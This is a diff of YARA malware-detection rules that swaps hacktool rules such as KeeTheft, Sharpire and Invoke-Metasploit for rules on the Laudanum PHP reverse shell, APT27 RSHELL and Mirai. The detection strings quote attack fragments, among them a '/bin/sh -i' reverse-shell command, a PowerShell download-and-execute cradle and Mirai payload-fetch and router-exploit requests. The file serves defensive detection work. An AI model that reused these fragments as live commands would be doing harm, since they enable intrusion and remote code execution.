+		filesize < 21KB and all of them
 }
-rule SIGNATURE_BASE_Keetheft_EXE : FILE
+rule SIGNATURE_BASE_Php_Reverse_Shell_2 : FILE
 {
 	meta:
-		description = "Detects component of KeeTheft - KeePass dump tool - file KeeTheft.exe"
+		description = "Laudanum Injector Tools - file php-reverse-shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "65531239-c5fa-5285-8f44-2d858e211c9b"
-		date = "2017-08-29"
-		modified = "2025-04-14"
-		reference = "https://github.com/HarmJ0y/KeeThief"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3993-L4012"
+		id = "f10cc33e-0cb6-5d08-af1f-5ef76368de9d"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L298-L312"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a6019248ad9708b1508fdf77a2ecbe92a7e8aac916fbca88aec117abeb07b9a0"
+		hash = "025db3c3473413064f0606d93d155c7eb5049c42"
+		logic_hash = "695dc565c273ed358f7d56526fa4956ba13b216d8897d0707e1660a82b745081"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f06789c3e9fe93c165889799608e59dda6b10331b931601c2b5ae06ede41dc22"
 
 	strings:
-		$x1 = "Error: Could not create a thread for the shellcode" fullword wide
-		$x2 = "Could not find address marker in shellcode" fullword wide
-		$x3 = "GenerateDecryptionShellCode" fullword ascii
-		$x4 = "KeePassLib.Keys.KcpPassword" fullword wide
-		$x5 = "************ Found a CompositeKey! **********" fullword wide
-		$x6 = "*** Interesting... there are multiple .NET runtimes loaded in KeePass" fullword wide
-		$x7 = "GetKcpPasswordInfo" fullword ascii
+		$s1 = "$process = proc_open($shell, $descriptorspec, $pipes);" fullword ascii
+		$s7 = "$shell = 'uname -a; w; id; /bin/sh -i';" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_Keetheft_Out_Shellcode : FILE
+rule SIGNATURE_BASE_Laudanum_Tools_Generic : FILE
 {
 	meta:
-		description = "Detects component of KeeTheft - KeePass dump tool - file Out-Shellcode.ps1"
+		description = "Laudanum Injector Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1263ad5d-5d50-50e6-ad78-9d5e4e16634b"
-		date = "2017-08-29"
-		modified = "2025-04-14"
-		reference = "https://github.com/HarmJ0y/KeeThief"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4014-L4028"
+		id = "15738788-5f34-54d0-92fe-f7024c998a54"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L314-L345"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2d536edf1a40defc3b3aa7ce8e595c53e7dd3b7f1daea772c13319ee5bf7675e"
+		logic_hash = "52c6d3be4fc91e8a61645886fa89bf78eddad51960702ff2ac83ec01d5d529ef"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2afb1c8c82363a0ae43cad9d448dd20bb7d2762aa5ed3672cd8e14dee568e16b"
+		super_rule = 1
+		hash0 = "076aa781a004ecb2bf545357fd36dcbafdd68b1a"
+		hash1 = "885e1783b07c73e7d47d3283be303c9719419b92"
+		hash2 = "01d5d16d876c55d77e094ce2b9c237de43b21a16"
+		hash3 = "7421d33e8007c92c8642a36cba7351c7f95a4335"
+		hash4 = "f49291aef9165ee4904d2d8c3cf5a6515ca0794f"
+		hash5 = "c0dee56ee68719d5ec39e773621ffe40b144fda5"
+		hash6 = "f32b9c2cc3a61fa326e9caebce28ef94a7a00c9a"
+		hash7 = "dc5c03a21267d024ef0f5ab96a34e3f6423dfcd6"
+		hash8 = "fd498c8b195967db01f68776ff5e36a06c9dfbfe"
+		hash9 = "b50ae35fcf767466f6ca25984cc008b7629676b8"
+		hash10 = "5570d10244d90ef53b74e2ac287fc657e38200f0"
+		hash11 = "42bcb491a11b4703c125daf1747cf2a40a1b36f3"
+		hash12 = "83e4eaaa2cf6898d7f83ab80158b64b1d48096f4"
+		hash13 = "dec7ea322898690a7f91db9377f035ad7072b8d7"
+		hash14 = "a2272b8a4221c6cc373915f0cc555fe55d65ac4d"
+		hash15 = "588739b9e4ef2dbb0b4cf630b73295d8134cc801"
+		hash16 = "43320dc23fb2ed26b882512e7c0bfdc64e2c1849"
 
 	strings:
-		$x1 = "Write-Host \"Shellcode length: 0x$(($ShellcodeLength + 1).ToString('X4'))\"" fullword ascii
-		$x2 = "$TextSectionInfo = @($MapContents | Where-Object { $_ -match '\\.text\\W+CODE' })[0]" fullword ascii
+		$s1 = "***  laudanum@secureideas.net" fullword ascii
+		$s2 = "*** Laudanum Project" fullword ascii
 
 	condition:
-		( filesize < 2KB and 1 of them )
+		filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_Sharpire : FILE
+rule SIGNATURE_BASE_APT_MAL_APT27_Rshell_Jul24 : MALWARE RSHELL___SYSUPDATE FILE
 {
 	meta:
-		description = "Auto-generated rule - file Sharpire.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "747f2798-4f93-5073-b358-969060a1c937"
-		date = "2017-09-23"
-		modified = "2022-12-21"
-		reference = "https://github.com/0xbadjuju/Sharpire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4038-L4061"
+		description = "YARA rule to detect RSHELL of APT27"
+		author = "Bundesamt fuer Verfassungsschutz, modified by Florian Roth"
+		id = "67c8ac4e-8e2f-5cca-90cb-5d5fdf6f86b5"
+		date = "2024-07-11"
+		modified = "2024-12-12"
+		reference = "https://x.com/bfv_bund/status/1811364839656185985?s=12&t=C0_T_re0wRP_NfKa27Xw9w"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_rshell.yar#L2-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1437b4c5229761bcc18d97ea6328866f4b9c763461fa6ecb5c18e6f3961c3114"
+		logic_hash = "be5f6281d722bd07e53acd459c794fe3ae870a05ed8979de4c28d357110617bd"
 		score = 75
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "327a1dc2876cd9d7f6a5b3777373087296fc809d466e42861adcf09986c6e587"
+		quality = 85
+		tags = "MALWARE, RSHELL / SYSUPDATE, FILE"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		malware = "RSHELL / SYSUPDATE"
+		hash1 = "0433edfad648e1e29be54101abaded690302dc7e49ad916cfbbddf99b3ade12c"
+		hash2 = "10bb89fdf25c88d3c5623e8d68573124c9a42549750014e3675e2ca342aeba4a"
+		hash3 = "2603e1f61363451891c97b0c4ce8acfbfb680d3df4282f9d151ecce3a5679616"
+		hash4 = "70dac42491f8f19568a5d7b1d10b29f732a88d75e7f2bfa07b23202bacadf56f"
+		hash5 = "b988a6583ce40f07e5fc8e890ae2b1c84a93db8a2e3ca8769241b94bea332a7a"
+		hash6 = "c4fe1e56f601d411e2385352606524fb8bbf773bc2ba14889a8de605c2d14da0"
+		hash7 = "c787144d285fcca8a542f7a5525a37bcd089b39068b9a4db7fe3554ee6c08301"
+		hash8 = "ddaa4d23e4651a517fffbd29f0924607ba6b6253171144da5e49237afe91666b"
 
 	strings:
-		$x1 = "\\obj\\Debug\\Sharpire.pdb" ascii
-		$x2 = "[*] Upload of $fileName successful" fullword wide
-		$s1 = "no shell command supplied" fullword wide
-		$s2 = "/login/process.php" fullword wide
-		$s3 = "invokeShellCommand" fullword ascii
-		$s4 = "..Command execution completed." fullword wide
-		$s5 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword wide
-		$s6 = "/admin/get.php" fullword wide
-		$s7 = "[!] Error in stopping job: " fullword wide
+		$a1 = "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%" ascii
+		$a2 = "/proc/self/exe" ascii
+		$s1 = "HISTFILE" ascii fullword
+		$s2 = "/tmp/guid" ascii fullword
+		$sop1 = { e8 ?? ?? ?? ?? c7 43 04 00 00 00 00 8b 3b 85 ff 7e 2? e8 ?? ?? 0? 00 85 c0 7e 0? }
+		$sop2 = { c7 43 04 00 00 00 00 8b 3b 85 ff 7e 2? e8 ?? ?? 0? 00 85 c0 7e 0? f7 d8 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) and 3 of them ) )
+		( uint32be( 0 ) == 0x7f454c46 or ( uint32be( 0 ) == 0xcafebabe and uint32be( 4 ) < 0x20 ) or uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xfeedfacf ) and filesize < 2MB and all of ( $a* ) and 2 of ( $s* ) or 3 of ( $s* )
 }
-rule SIGNATURE_BASE_Invoke_Metasploit : FILE
+
+rule SIGNATURE_BASE_SUSP_Adobepdf_SFX_Bitmap_Combo_Executable : FILE
 {
 	meta:
-		description = "Detects Invoke-Metasploit Payload"
+		description = "Detects a suspicious executable that contains both a SFX icon and an Adobe PDF icon"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40452884-df3f-5b49-ad10-05006cb115f2"
-		date = "2017-09-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/jaredhaight/Invoke-MetasploitPayload/blob/master/Invoke-MetasploitPayload.ps1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4071-L4086"
+		id = "d2d078c9-fbe5-51f4-8f7e-5d943c5a8197"
+		date = "2020-11-02"
+		modified = "2023-12-05"
+		reference = "https://mp.weixin.qq.com/s/3Pa3hiuZyQBspDzH0kGSHw"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_icon_anomalies.yar#L3-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7ef174008517b101be844e30890626378f49a275bad3f08ce25fb8d6118c77c3"
-		score = 75
+		logic_hash = "ac515d698507be6085684a6ec4622c6f3c26d0c3a0d94cbbeacfab7dfb9fe135"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b36d3ca7073741c8a48c578edaa6d3b6a8c3c4413e961a83ad08ad128b843e0b"
+		hash1 = "13655f536fac31e6c2eaa9e6e113ada2a0b5e2b50a93b6bbfc0aaadd670cde9b"
 
 	strings:
-		$s1 = "[*] Looks like we're 64bit, using regular powershell.exe" ascii wide
-		$s2 = "[*] Kicking off download cradle in a new process"
-		$s3 = "Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+''');'"
+		$sc1 = { FF 00 CC FF FF 00 99 FF FF 00 66 FF FF 00 33 FF
+               FF 80 00 FF FF 80 FF CC FF 80 CC CC FF C0 99 CC
+               FF 80 66 CC FF 00 33 CC FF 00 00 CC FF 00 FF 99
+               FF FF CC 99 FF FF 99 99 FF FF 66 99 FF FF 33 99
+               FF 08 00 99 FF 88 FF 66 FF 88 CC 66 FF 88 99 66
+               FF 88 66 66 FF 88 33 66 FF 05 00 66 FF 55 FF 33
+               FF 55 CC 33 FF 55 99 33 FF 55 66 33 FF 58 33 33
+               FF 01 00 33 FF 99 FF 00 FF 99 CC 00 FF 99 99 00
+               FF 99 66 00 FF 58 33 00 FF 01 00 00 FF 99 FF FF
+               CC 99 CC FF CC 99 99 FF CC 99 66 FF CC 58 33 FF
+               CC 01 00 FF CC FF FF CC CC FF CC CC CC FF 99 CC
+               CC FF 66 CC CC 58 33 CC CC 01 00 CC CC FF FF 99 }
+		$sc2 = { 28 66 27 00 60 00 00 00 80 00 00 00 80 80 80 00
+               C0 C0 C0 00 FF FF FF 00 FF FF FF 00 FF FF FF 00
+               FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00
+               FF FF FF 00 FF FF FF 00 5D 33 00 00 5D 33 00 00
+               5D 33 00 00 5D 33 00 00 5D 33 00 00 5D 33 00 00
+               5D 33 00 00 5D 33 00 00 5D 33 00 00 5D 33 00 00 }
 
 	condition:
-		( filesize < 20KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and all of them and pe.number_of_signatures < 1
 }
-rule SIGNATURE_BASE_Powershell_Mal_Hacktool_Gen : FILE
+
+rule SIGNATURE_BASE_SUSP_Adobepdf_Bitmap_Executable : FILE
 {
 	meta:
-		description = "Detects PowerShell hack tool samples - generic PE loader"
+		description = "Detects a suspicious executable that contains a Adobe PDF icon and no shows no sign of actual Adobe software"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d1fc4594-d816-5d02-bff6-3f220477b555"
-		date = "2017-11-02"
-		modified = "2025-04-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4088-L4104"
+		id = "86ebadd4-64a8-5290-b45e-ac125a10ea66"
+		date = "2020-11-02"
+		modified = "2023-12-05"
+		reference = "https://mp.weixin.qq.com/s/3Pa3hiuZyQBspDzH0kGSHw"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_icon_anomalies.yar#L39-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "273222cde3ff155cef09c25192dcb4865179e8172e625fe8f43b21a13fe1a170"
-		score = 75
+		logic_hash = "a8ef5ce2e876565c7d6367ce555d00bd3535699f1907f867811f2f6749672c67"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d442304ca839d75b34e30e49a8b9437b5ab60b74d85ba9005642632ce7038b32"
+		hash1 = "13655f536fac31e6c2eaa9e6e113ada2a0b5e2b50a93b6bbfc0aaadd670cde9b"
 
 	strings:
-		$x1 = "$PEBytes32 = 'TVqQAAMAAAAEAAAA" wide
-		$x2 = "Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp" fullword wide
-		$x3 = "@($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)" fullword wide
-		$x4 = "(Shellcode: LoadLibraryA.asm)" fullword wide
+		$sc1 = { FF 00 CC FF FF 00 99 FF FF 00 66 FF FF 00 33 FF
+               FF 80 00 FF FF 80 FF CC FF 80 CC CC FF C0 99 CC
+               FF 80 66 CC FF 00 33 CC FF 00 00 CC FF 00 FF 99
+               FF FF CC 99 FF FF 99 99 FF FF 66 99 FF FF 33 99
+               FF 08 00 99 FF 88 FF 66 FF 88 CC 66 FF 88 99 66
+               FF 88 66 66 FF 88 33 66 FF 05 00 66 FF 55 FF 33
+               FF 55 CC 33 FF 55 99 33 FF 55 66 33 FF 58 33 33
+               FF 01 00 33 FF 99 FF 00 FF 99 CC 00 FF 99 99 00
+               FF 99 66 00 FF 58 33 00 FF 01 00 00 FF 99 FF FF
+               CC 99 CC FF CC 99 99 FF CC 99 66 FF CC 58 33 FF
+               CC 01 00 FF CC FF FF CC CC FF CC CC CC FF 99 CC
+               CC FF 66 CC CC 58 33 CC CC 01 00 CC CC FF FF 99 }
+		$fp1 = "Adobe" ascii wide fullword
 
 	condition:
-		filesize < 8000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and $sc1 and not 1 of ( $fp* ) and pe.number_of_signatures < 1
 }
-rule SIGNATURE_BASE_Sig_Remoteadmin_1 : FILE
+rule SIGNATURE_BASE_Mirai_Botnet_Malware : FILE
 {
 	meta:
-		description = "Detects strings from well-known APT malware"
+		description = "Detects Mirai Botnet Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "da55084c-ec1f-5800-a614-189dce7b5820"
-		date = "2017-12-03"
-		modified = "2025-04-14"
+		id = "a678e9f7-d516-5bdb-962e-b9d39d8a64bb"
+		date = "2016-10-04"
+		modified = "2023-01-27"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4106-L4120"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L10-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "81912bbfc1f6ac3ec7c54fc935b9ed531c97ad509cf2c096a19e638836cd0baf"
-		score = 45
-		quality = 85
+		logic_hash = "384f8377ca05296da1177a8939f526069fbad0bb73769bd282d81ea4d876003c"
+		score = 75
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c"
+		hash2 = "05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c"
+		hash3 = "20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4"
+		hash4 = "2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69"
+		hash5 = "420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175"
+		hash6 = "62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6"
+		hash7 = "70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0"
+		hash8 = "89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147"
+		hash9 = "bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4"
+		hash10 = "c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f"
+		hash11 = "d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89"
+		hash12 = "f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5"
+		hash13 = "fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b"
 
 	strings:
-		$ = "Radmin, Remote Administrator" wide
-		$ = "Radmin 3.0" wide
+		$x1 = "POST /cdn-cgi/" ascii
+		$x2 = "/dev/misc/watchdog" fullword ascii
+		$x3 = "/dev/watchdog" ascii
+		$x5 = ".mdebug.abi32" fullword ascii
+		$s1 = "LCOGQGPTGP" fullword ascii
+		$s2 = "QUKLEKLUKVJOG" fullword ascii
+		$s3 = "CFOKLKQVPCVMP" fullword ascii
+		$s4 = "QWRGPTKQMP" fullword ascii
+		$s5 = "HWCLVGAJ" fullword ascii
+		$s6 = "NKQVGLKLE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+		uint16( 0 ) == 0x457f and filesize < 200KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or 4 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Remcom_Remotecommandexecution
+rule SIGNATURE_BASE_Mirai_1_May17 : FILE
 {
 	meta:
-		description = "Detects strings from RemCom tool"
+		description = "Detects Mirai Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "90b4ce3c-a690-5b6e-95e8-7e5dc8270152"
-		date = "2017-12-28"
-		modified = "2025-04-14"
-		reference = "https://goo.gl/tezXZt"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4122-L4137"
+		id = "ac85ee28-a01f-5c3d-a534-0c19a3dc92e7"
+		date = "2017-05-12"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L62-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c39a09c8d0c1799febcb4d9eafece43f8b21e7ffc277fdfad6c235eb1a201697"
-		score = 50
+		logic_hash = "6816ab3b455bbde6c4bb43bff162615d7fc24b9d5828faa190600387c38978e1"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "172d050cf0d4e4f5407469998857b51261c80209d9fa5a2f5f037f8ca14e85d2"
+		hash2 = "9ba8def84a0bf14f682b3751b8f7a453da2cea47099734a72859028155b2d39c"
+		hash3 = "a393449a5f19109160384b13d60bb40601af2ef5f08839b5223f020f1f83e990"
 
 	strings:
-		$ = "\\\\.\\pipe\\%s%s%d"
-		$ = "%s\\pipe\\%s%s%d%s"
-		$ = "\\ADMIN$\\System32\\%s%s"
+		$s1 = "GET /bins/mirai.x86 HTTP/1.0" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x457f and filesize < 5000KB and all of them )
 }
-rule SIGNATURE_BASE_Crackmapexec_EXE : FILE
+rule SIGNATURE_BASE_Miari_2_May17 : FILE
 {
 	meta:
-		description = "Detects CrackMapExec hack tool"
+		description = "Detects Mirai Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9fcfba98-7ba1-5810-99b7-62ad2b1aa4c0"
-		date = "2018-04-06"
-		modified = "2025-04-14"
+		id = "1c2cc98d-8ca5-5055-8f86-7f85c046ccd9"
+		date = "2017-05-12"
+		modified = "2023-12-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4139-L4155"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L80-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa05fa41d6aaed45a9b44806a310fdb584874f7eb382e576b36e6d1db87cef88"
-		score = 85
+		logic_hash = "138a7d0c5508f0168f09329e97f00d0aacef17297558338cd88a9dc3ddddfee3"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "371f104b7876b9080c519510879235f36edb6668097de475949b84ab72ee9a9a"
+		super_rule = 1
+		hash1 = "9ba8def84a0bf14f682b3751b8f7a453da2cea47099734a72859028155b2d39c"
+		hash2 = "a393449a5f19109160384b13d60bb40601af2ef5f08839b5223f020f1f83e990"
 
 	strings:
-		$s1 = "core.scripts.secretsdump(" ascii
-		$s2 = "core.scripts.samrdump(" ascii
-		$s3 = "core.uacdump(" ascii
+		$s1 = "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36" fullword ascii
+		$s2 = "GET /g.php HTTP/1.1" fullword ascii
+		$s3 = "https://%[^/]/%s" fullword ascii
+		$s4 = "pass\" value=\"[^\"]*\"" fullword ascii
+		$s5 = "jbeupq84v7.2y.net" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 2 of them
+		( uint16( 0 ) == 0x457f and filesize < 5000KB and 2 of them )
 }
-
-rule SIGNATURE_BASE_SUSP_Imphash_Passrevealer_PY_EXE : FILE
+rule SIGNATURE_BASE_MAL_ELF_LNX_Mirai_Oct10_1 : FILE
 {
 	meta:
-		description = "Detects an imphash used by password revealer and hack tools (some false positives with hardware driver installers)"
+		description = "Detects ELF Mirai variant"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9462dfc4-2feb-591d-ac0c-ba02f093c216"
-		date = "2018-04-06"
-		modified = "2021-11-09"
+		id = "7bb28f03-03ba-581a-bc03-bd09a52787d9"
+		date = "2018-10-27"
+		modified = "2023-01-27"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4157-L4175"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L101-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "684e901eebf47e2bd8b25fd302963c2761376ce4754d74f9e6f1eb3024c89144"
-		score = 40
+		logic_hash = "d16ed12522b310fccab027355281a206f5087d555f0d1fef4e7746d01d085613"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "371f104b7876b9080c519510879235f36edb6668097de475949b84ab72ee9a9a"
+		hash1 = "3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe"
 
 	strings:
-		$fp1 = "Assmann Electronic GmbH" ascii wide
-		$fp2 = "Oculus VR" ascii wide
-		$fp3 = "efm8load" ascii
+		$x1 = " -r /vi/mips.bushido; "
+		$x2 = "/bin/busybox chmod 777 * /tmp/" ascii
+		$s1 = "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1" fullword ascii
+		$s2 = "loadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>" fullword ascii
+		$s3 = "POST /cdn-cgi/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and pe.imphash ( ) == "ed61beebc8d019dd9bec823e2d694afd" and not 1 of ( $fp* )
+		uint16( 0 ) == 0x457f and filesize < 200KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or all of ( $x* ) )
 }
-rule SIGNATURE_BASE_MAL_Unknown_Pwdumper_Apr18_3 : FILE
+rule SIGNATURE_BASE_MAL_ELF_LNX_Mirai_Oct10_2 : FILE
 {
 	meta:
-		description = "Detects sample from unknown sample set - IL origin"
+		description = "Detects ELF malware Mirai related"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2431d562-dcd8-5d21-8406-7d2567b6eca9"
-		date = "2018-04-06"
-		modified = "2025-04-14"
+		id = "421b7708-030e-50d1-bf2e-e91758a48c00"
+		date = "2018-10-27"
+		modified = "2023-12-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4177-L4196"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L124-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bf0dff02bdfa239336b2bc865f2a9aed6d20cafb059caa87a60aa30269dd94b5"
+		logic_hash = "47d20bdf64c18c925dc1391b022278f913b7fbce13988a7b5de2e9d135c5a265"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d435e7b6f040a186efeadb87dd6d9a14e038921dc8b8658026a90ae94b4c8b05"
-		hash2 = "8c35c71838f34f7f7a40bf06e1d2e14d58d9106e6d4e6f6e9af732511a126276"
+		hash1 = "fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9"
 
 	strings:
-		$s1 = "loaderx86.dll" fullword ascii
-		$s2 = "tcpsvcs.exe" fullword wide
-		$s3 = "%Program Files, Common FOLDER%" fullword wide
-		$s4 = "%AllUsers, ApplicationData FOLDER%" fullword wide
-		$s5 = "loaderx86" fullword ascii
-		$s6 = "TNtDllHook$" fullword ascii
+		$c01 = { 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00
+               20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D
+               41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		uint16( 0 ) == 0x457f and filesize < 200KB and all of them
 }
-
-rule SIGNATURE_BASE_Processinjector_Gen : HIGHVOL FILE
+rule SIGNATURE_BASE_MAL_Mirai_Nov19_1 : FILE
 {
 	meta:
-		description = "Detects a process injection utility that can be used ofr good and bad purposes"
+		description = "Detects Mirai malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b0b6ac7-8432-5f93-b389-c2356ec75113"
-		date = "2018-04-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/cuckoosandbox/monitor/blob/master/bin/inject.c"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4198-L4219"
